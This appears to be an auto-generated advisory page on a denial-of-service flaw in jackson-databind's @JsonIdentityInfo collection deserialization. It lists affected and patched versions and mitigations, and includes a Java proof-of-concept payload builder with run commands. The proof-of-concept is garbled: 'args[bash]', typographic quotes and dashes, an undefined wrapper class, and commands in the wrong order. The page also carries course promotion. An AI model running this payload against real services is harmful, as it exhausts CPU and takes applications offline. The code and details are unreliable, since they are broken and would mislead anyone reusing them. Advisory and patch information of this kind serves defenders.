Listen to this Post
CVE-2026-91777 is a high-severity denial-of-service vulnerability in FasterXML jackson-databind. The flaw resides in the forward-reference completion logic used when deserializing JSON into collections or maps annotated with @JsonIdentityInfo. When an attacker submits a shallow JSON document that first declares N unresolved object-ID references and then resolves those same IDs in reverse order, the deserializer performs a linear scan of the pending-reference accumulator for every resolved ID. This results in approximately N (N + 1) / 2 identity comparisons, turning a linear-size input into quadratic CPU work. The affected code paths are CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference() and the equivalent implementation in MapDeserializer. The vulnerability was runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and 3.2.1, with 2.5.0 identified as the conservative affected floor because a 2.4.0 control fails closed before successful reverse-order completion. The issue does not require deep nesting or syntactically unusual JSON. Exploitation requires an application that deserializes attacker-influenced JSON into an identity-enabled collection or map. The reported impact is limited to availability; there is no confidentiality, integrity, or code-execution impact. The fix replaces the repeated linear lookup with a keyed pending-reference structure. Patched versions are 2.18.11, 2.21.7, 2.22.3, 3.1.7, and 3.2.3. The vulnerability was reported by Daniel Birtwhistle.
DailyCVE Form:
Platform: jackson-databind
Version: 2.5.0–3.2.2
Vulnerability: Quadratic Forward-Reference
Severity: High
date: 2026-09-23
Prediction: 2026-10-15
What Undercode Say: Analytics
Bash commands:
java -Xmx512M -cp target/classes:target/test-classes com.example.PoC –size 2000
javac -d target/classes src/main/java/com/example/PoC.java
mvn clean test -Dtest=QuadraticForwardReferenceTest
Code:
// ID class that counts equals() calls
public class CountingId {
private final int value;
private static long equalsCalls = 0;
public CountingId(int value) { this.value = value; }
@Override
public boolean equals(Object o) {
equalsCalls++;
if (this == o) return true;
if (!(o instanceof CountingId)) return false;
return value == ((CountingId) o).value;
}
@Override
public int hashCode() { return value; }
public static long getEqualsCalls() { return equalsCalls; }
public static void reset() { equalsCalls = 0; }
}
// PoC main
public class PoC {
public static void main(String[] args) {
int n = Integer.parseInt(args[bash]);
CountingId.reset();
// Build JSON: N references then reverse-order definitions
StringBuilder json = new StringBuilder(“{\”items\”:[“);
for (int i = 0; i < n; i++) {
if (i > 0) json.append(“,”);
json.append(“{\”id\”:” + i + “,\”ref\”:true}”);
}
for (int i = n – 1; i >= 0; i–) {
json.append(“,{\”id\”:” + i + “,\”ref\”:false}”);
}
json.append(“]}”);
ObjectMapper mapper = new ObjectMapper();
mapper.readValue(json.toString(), CollectionWrapper.class);
System.out.println(“Equals calls: ” + CountingId.getEqualsCalls());
}
}
How Exploit: (Educational Purposes!)
The exploit constructs a JSON payload with a shallow collection containing N unresolved @JsonIdentityInfo references followed by definitions of the same IDs in reverse order. With N=2,000, affected versions perform exactly 2,003,000 ID comparisons, while a control with all references already resolved performs zero comparisons in the pending-reference lookup path. The run is bounded to a 512 MiB JVM. The result demonstrates quadratic growth: approximately N (N + 1) / 2 comparisons, plus fixed setup comparisons. An unauthenticated source that can submit JSON to an application using the affected identity-enabled collection or map shape can consume quadratic CPU and exhaust a request-time or worker-capacity budget, causing denial of service.
Protection: from this CVE
Upgrade to com.fasterxml.jackson.core:jackson-databind 2.18.11, 2.21.7, or 2.22.3, or to tools.jackson.core:jackson-databind 3.1.7 or 3.2.3. Bound the size of JSON documents deserialized into @JsonIdentityInfo-enabled collections and maps, and cap the number of elements accepted for such types. Remove @JsonIdentityInfo from types reachable from attacker-influenced input. Apply wall-clock timeouts on deserialization to limit the impact of a single request.
Impact:
An unauthenticated source that can submit JSON to an application using the affected identity-enabled collection or map shape can consume quadratic CPU and exhaust a request-time or worker-capacity budget, causing denial of service. The application model/configuration prerequisite is material. No confidentiality, integrity, code-execution, or parser-depth impact is claimed. Requested credit: Daniel Birtwhistle.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

